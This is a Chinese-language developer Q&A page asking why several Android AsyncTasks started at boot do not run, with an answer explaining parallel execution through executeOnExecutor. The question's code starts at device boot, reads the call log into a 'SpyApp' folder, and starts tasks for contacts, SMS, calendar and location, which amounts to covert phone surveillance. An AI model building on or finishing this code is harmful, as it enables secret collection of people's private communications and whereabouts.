当前位置: 首页 > 知识库问答 >
问题:

我可以添加多个AsyncTask并同时执行吗?

邬安邦
2023-03-14

我可以添加多个AsyncTask并同时执行吗?我可以从主activity开始执行多个Asynctask,如下所示。

公共类接收器扩展广播接收器{

@SuppressWarnings("deprecation")
@Override
public void onReceive(Context context, Intent intent) {
    // TODO Auto-generated method stub
    Log.e("Hello>>", "From OnReceive");

    if (intent.getAction().equals(Intent.ACTION_BOOT_COMPLETED)) {
        Log.e("Hello......>>", "From OnReceive");

        MyContactsSending mycon= new MyContactsSending(context);
        mycon.execute();

        Log.e("contacts","Executed");
        MyCallsSending send = new MyCallsSending(context);
        send.execute();

        Log.e("calls","Executed");

        MySmsSending smssms = new MySmsSending(context);
        smssms.execute();

        Log.e("sms","Executed");

        MyCalendarSending calendar = new MyCalendarSending(context);
        calendar.execute();

        Log.e("calendar","Executed");
        MyLocationSending location = new MyLocationSending(context);

        location.execute();
        Log.e("GPS","Executed");

    }

}

}

在这段代码中,我得到了所有的日志,但在此之后,它将不会在AsyncTask的doInBackground()方法中运行。我在每个类方法doInBackground()中设置了Log,但没有一个在Log中被命中(意味着没有一个方法被执行)。

我的问题是我能像这样执行多个AsyncTask对象吗?

我的AsyncTask类的一个代码是这样的:

公共类MyCallsSend扩展AsyncTask{

Context concall;
public MyCallsSending(Context con){
    this.concall = con;
}
@Override
protected Void doInBackground(Void... params) {
    // TODO Auto-generated method stub

    Calls call = new Calls(concall);
    call.getCallDetails();
    Log.e("Calls Sending", "from asynctask");

    return null;
}

}

Calls类的代码如下所示:

公共类调用{

Context con;

public calls(Context con){
    this.con = con;
}

public void getCallDetails() {

    StringBuffer sb = new StringBuffer();
    Cursor managedCursor = con.getContentResolver().query(CallLog.Calls.CONTENT_URI, null,
            null, null, null);
    if (managedCursor != null) {
        Log.i("Cursor has values...", "Yes");
    }
    int number = managedCursor.getColumnIndex(CallLog.Calls.NUMBER);
    int type = managedCursor.getColumnIndex(CallLog.Calls.TYPE);
    int date = managedCursor.getColumnIndex(CallLog.Calls.DATE);
    int duration = managedCursor.getColumnIndex(CallLog.Calls.DURATION);
    sb.append("************Call Details************\n");
    managedCursor.moveToFirst();

    do {
        String phNumber = managedCursor.getString(number);
        String callType = managedCursor.getString(type);
        String callDate = managedCursor.getString(date);
        Date callDayTime = new Date(Long.valueOf(callDate));
        String callDuration = managedCursor.getString(duration);
        String dir = null;
        int dircode = Integer.parseInt(callType);

        switch (dircode) {
        case CallLog.Calls.OUTGOING_TYPE:
            dir = "OUTGOING";
            break;

        case CallLog.Calls.INCOMING_TYPE:
            dir = "INCOMING";
            break;

        case CallLog.Calls.MISSED_TYPE:
            dir = "MISSED";
            break;

        }

        Log.i("Values", phNumber + callType + callDate);
        sb.append("\nPhone Number:- " + phNumber + " \nCall Type:- " + dir
                + " \nCall Date:- " + callDayTime
                + " \nCall duration in sec :- " + callDuration);
        sb.append("\n-----------------------------------");
    } while (managedCursor.moveToNext());


    managedCursor.close();

    try {

        File myFile = new File(Environment.getExternalStorageDirectory()
                + File.separator + "SpyApp");
        if (!myFile.exists()) {
            myFile.mkdir();
        } else {
            //Toast.makeText(getApplicationContext(), "Already Created..",
                //  Toast.LENGTH_LONG).show();
        }
        String path = myFile.getPath();
        //Log.e(">>>>>>>>>>>>>", ">>>>>>>>>" + path);

        File file = new File(path + File.separator + "CallLog.txt");
        if (!file.exists()) {
            file.createNewFile();
        } else {
            //Toast.makeText(getApplicationContext(), "Already Created..",
                //  Toast.LENGTH_LONG).show();
        }

        FileOutputStream fOut = new FileOutputStream(file);
        OutputStreamWriter myOutWriter = new OutputStreamWriter(fOut);

        myOutWriter.append(sb.toString());
        myOutWriter.flush();
        myOutWriter.close();
        fOut.close();
        //Toast.makeText(getBaseContext(), "Done writing SD 'mysdfile.txt'",
            //  Toast.LENGTH_SHORT).show();
    } catch (Exception e) {
        //Toast.makeText(getBaseContext(), e.getMessage(), Toast.LENGTH_SHORT)
            //  .show();
    }

}

}

共有1个答案

郭皓
2023-03-14

短版:当然可以!

AsyncTask默认情况下在串行队列中执行(一个接一个),但如果您希望它们同时运行,您可以:

new MyAsyncTask().executeOnExecutor(AsyncTask.THREAD_POOL_EXECUTOR, MY_RANDOM_VAR);

从蜂巢开始,任务在单线程上执行,以避免并行执行导致的常见应用程序错误。如果您真正想要并行执行,可以使用Thread_Pool_Executor调用executeOnExecutor(java.util.concurrent.Executor,object[])。Android文档上的AsyncTask

使用并行线程时要小心,不要使设备过载而导致应用程序被杀死。

 类似资料:
  • 问题内容: 我正在将pytest用于我的selenium测试,并想知道在一个测试中是否可能有多个断言? 我调用了一个比较多个值的函数,并且我希望测试报告所有不匹配的值。我遇到的问题是,使用“ assert”或“ pytest.fail”会在发现不匹配的值时立即停止测试。 有没有办法让测试继续运行并报告所有不匹配的值? 问题答案: 正如Jon Clements所评论的那样,您可以填充错误消息列表,然

  • 在我的测试应用程序中,我有我的安全配置类,如下所示。 在那里我定义了encoder()并将其注释为@beans。这意味着该方法生成一个bean由spring容器管理。同样,我需要通过构造函数访问编码器,如下所示。 在上面的示例中,我使用密码编码器作为构造函数参数。问题是@Bean方法不是由调用RegistrationController的时间构造函数执行的。在将encoder()添加到bootst

  • Spring批处理-需要帮助以并行和多个节点运行批处理作业的独立步骤。一个spring批处理作业(JobA),包含三个步骤[步骤A(在compute1中)和步骤B(在compute2中)以及步骤C] StepA和StepB是独立的步骤,占用大量内存,因此不能在同一计算节点/JVM上并行运行。要使StepC同时启动(StepA和StepB),需要成功完成。我不想为了节省时间而依次执行步骤A和步骤B。

  • 问题内容: JVM是否可以同时运行多个程序?如果是这样,怎么办?如果没有,为什么? 要运行程序,我们只需 但是我们可以使用同一个JVM实例来运行另一个程序吗? 问题答案: 答案取决于您对“程序”的定义。具有方法并以其开头的Java程序通常无法在同一JVM中运行,因为没有内置的资源或名称空间分隔。例如,如果两个程序使用同一库的冲突版本怎么办? 我们还提供了旨在共享JVM的应用程序,例如企业应用程序。

  • 我试图在springboot上同时运行多个计划任务,但实际上它们运行队列(一个接一个,不是并行的) 这是我简单的服务: 输出: 但是,它应该是这样的: 我做错了什么? 这是我的配置:

  • yield 指令可以很简单的将异步控制流以同步的写法表现出来,但与此同时我们将也会需要同时执行多个任务,我们不能直接这样写: // 错误写法,effects 将按照顺序执行 const users = yield call(fetch, '/users'), repos = yield call(fetch, '/repos') 由于第二个 effect 将会在第一个 call 执行完